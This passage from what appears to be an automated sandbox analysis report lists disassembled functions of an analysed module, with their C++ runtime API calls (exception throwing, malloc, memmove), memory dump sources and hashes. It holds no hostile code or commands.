                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F058EAF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8LockitLockit::_Throw__aligned_offset_mallocstd::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2477145047-2241063504
                                                                                                          • Opcode ID: 49eac49b51ba6b803e2e1fdbefbae66db610f04d017c0381f85f473034bbf34c
                                                                                                          • Instruction ID: 56a5365dd2b4afacbb354214ad5fac6b6084ae8e08c1b1c475a08e5fe61a967e
                                                                                                          • Opcode Fuzzy Hash: 49eac49b51ba6b803e2e1fdbefbae66db610f04d017c0381f85f473034bbf34c
                                                                                                          • Instruction Fuzzy Hash: F2F0C2368583243BD710EB549D01B9F37F89F80B14F400818FD65961C5EBB2A12985B3
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F05B5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F05B605
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • _memmove.LIBCMT ref: 6F05B634
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                          • String ID: vector<T> too long
                                                                                                          • API String ID: 1785806476-3788999226
                                                                                                          • Opcode ID: bfea75474a19e2c86dce9c0c17a576920449c38e56e1f85185b867cd9a934cf2
                                                                                                          • Instruction ID: d3aabd3c0e41ab35caf0029e7b1fd51812a4c840694ff0bafdbf67df38423773
                                                                                                          • Opcode Fuzzy Hash: bfea75474a19e2c86dce9c0c17a576920449c38e56e1f85185b867cd9a934cf2
                                                                                                          • Instruction Fuzzy Hash: BB01D4B26003099FC724DEA8DD80E67B3D8EF543147144A3DE8ABC3294E774F8008B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0527B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0527FA
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F05280F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: 5beea4584b0a4bcdb4e89ca67ad18805632acab65cf928b55b9a24f807c82e88
                                                                                                          • Instruction ID: 162f33a860858e894d183b6849ec48fed4114be7c938aedde0de205248ad0aeb
                                                                                                          • Opcode Fuzzy Hash: 5beea4584b0a4bcdb4e89ca67ad18805632acab65cf928b55b9a24f807c82e88
                                                                                                          • Instruction Fuzzy Hash: FA0181795002089FCB08DF58DA50AAAB7F5FF99300B24C5ADC82A47795DB31AA10CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F038400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F038449
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03845E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 4063778783-2241063504
                                                                                                          • Opcode ID: e738bc32a44e6fe93ceafc459a4a0c63e4d11e277e9903e3c0a71c3e4989e36d
                                                                                                          • Instruction ID: 982a562174315ee561d2e2bbbced58591604acc40f8832bb0d81ddc7e69508b6
                                                                                                          • Opcode Fuzzy Hash: e738bc32a44e6fe93ceafc459a4a0c63e4d11e277e9903e3c0a71c3e4989e36d
                                                                                                          • Instruction Fuzzy Hash: D701A479900308AFCB08DF54D490A9AB7F5EF54300B51C1AED92A4B794DB31EA04CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F084230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F084241
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • _memmove.LIBCMT ref: 6F084277
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                          • String ID: vector<bool> too long
                                                                                                          • API String ID: 1785806476-842332957
                                                                                                          • Opcode ID: 3b6c524f621fef6cad4426960c80f15baabeae053bdb4a8d0cf1e17acf22f955
                                                                                                          • Instruction ID: 29ba56e46217637b792815523f6b2b75812f60502f7f975eabf94eaaa90b2483
                                                                                                          • Opcode Fuzzy Hash: 3b6c524f621fef6cad4426960c80f15baabeae053bdb4a8d0cf1e17acf22f955
                                                                                                          • Instruction Fuzzy Hash: 6501F772A041056FDB04DFA9DCD0AEEF3A9FB84358F91433AE52687644E731B914CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F083840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F083855
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • _memmove.LIBCMT ref: 6F083880
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                          • String ID: vector<T> too long
                                                                                                          • API String ID: 1785806476-3788999226
                                                                                                          • Opcode ID: 703a317ebbb828aad9001d188307b41e81294ac16240cf1cf5452b29a2fd5219
                                                                                                          • Instruction ID: 42704e6f7df0d814575cde8a4312abfd06a4719321778e3fbedf0c6c2d7e73f5
                                                                                                          • Opcode Fuzzy Hash: 703a317ebbb828aad9001d188307b41e81294ac16240cf1cf5452b29a2fd5219
                                                                                                          • Instruction Fuzzy Hash: 7501D4715007099FD710DFADCC85A6BB3E8EF486147104A3DE8BAC3694EA31F8008B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F035160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F035173
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • _memmove.LIBCMT ref: 6F03519E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                          • String ID: vector<T> too long
                                                                                                          • API String ID: 1785806476-3788999226
                                                                                                          • Opcode ID: c97aa43301da8ade8abe37f29a5967084c15133d9c5b911a50c6a84513030449
                                                                                                          • Instruction ID: f832b0a6313b59fd3ad1258989830f7edc2e8d73286e4c946361be61dd810e6a
                                                                                                          • Opcode Fuzzy Hash: c97aa43301da8ade8abe37f29a5967084c15133d9c5b911a50c6a84513030449
                                                                                                          • Instruction Fuzzy Hash: E70184B26002069FDB24CEA8CC91A7AB3E8EB54244714462DE85AC3654E731F800CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04DEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04DF18
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04DF2D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: f736e94f11105785665e7cad3ba83a9825db7d81d0025e9d787fef710f2bbc98
                                                                                                          • Instruction ID: 4bb66ecf76861c2a3a69f2fb587534a18a890f915ff042bd878e90c14b35c43b
                                                                                                          • Opcode Fuzzy Hash: f736e94f11105785665e7cad3ba83a9825db7d81d0025e9d787fef710f2bbc98
                                                                                                          • Instruction Fuzzy Hash: BF015AB59007049FC728DF49D440E86BBF4AF58310B11C2AED8598B365E730FA00CFA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045CC8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045CDD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: a5c17d98f188b118efdda0bb4e64a607d423fa024afb3ca7e128ad27849d6e6b
                                                                                                          • Instruction ID: 43ae18906da24ad3a3a6f18a15ddb438b159b957cec7402d1a161fc8b2e42086
                                                                                                          • Opcode Fuzzy Hash: a5c17d98f188b118efdda0bb4e64a607d423fa024afb3ca7e128ad27849d6e6b
                                                                                                          • Instruction Fuzzy Hash: F9015AB59007049FC718DF59D441E8ABBF4BF48310B10C2AED8598B365EB30EA00CBE1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04DFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04DFC8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04DFDD
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: a0594683aa218f9885039d56928e9e9db52cf0cfa42cf3a6e7bed5dea52c6ad9
                                                                                                          • Instruction ID: cdb1fd8195ba0adb901f30055ff119a2caee98a2d16ade3e99bcb83f508afb70
                                                                                                          • Opcode Fuzzy Hash: a0594683aa218f9885039d56928e9e9db52cf0cfa42cf3a6e7bed5dea52c6ad9
                                                                                                          • Instruction Fuzzy Hash: 6C014FB59047049FC718DF59D440E8ABBF4AF48350B10C2AED8598B365EB30EA04CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045D30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045D58
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045D6D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 858a8815784c3d5e50be1b60f91d5c196bdeafeb9df7563b4ed7c03fc424b790
                                                                                                          • Instruction ID: 3d1677d9d98cbde1ca2f5c52d5409fc07b9b28efd3377d70041f6520e3213b73
                                                                                                          • Opcode Fuzzy Hash: 858a8815784c3d5e50be1b60f91d5c196bdeafeb9df7563b4ed7c03fc424b790
                                                                                                          • Instruction Fuzzy Hash: 77014FB59007049FC718DF59D441A8BBBF4AF48350B00C2AED8598B365EB31EA04CBD1
                                                                                                          Uniqueness

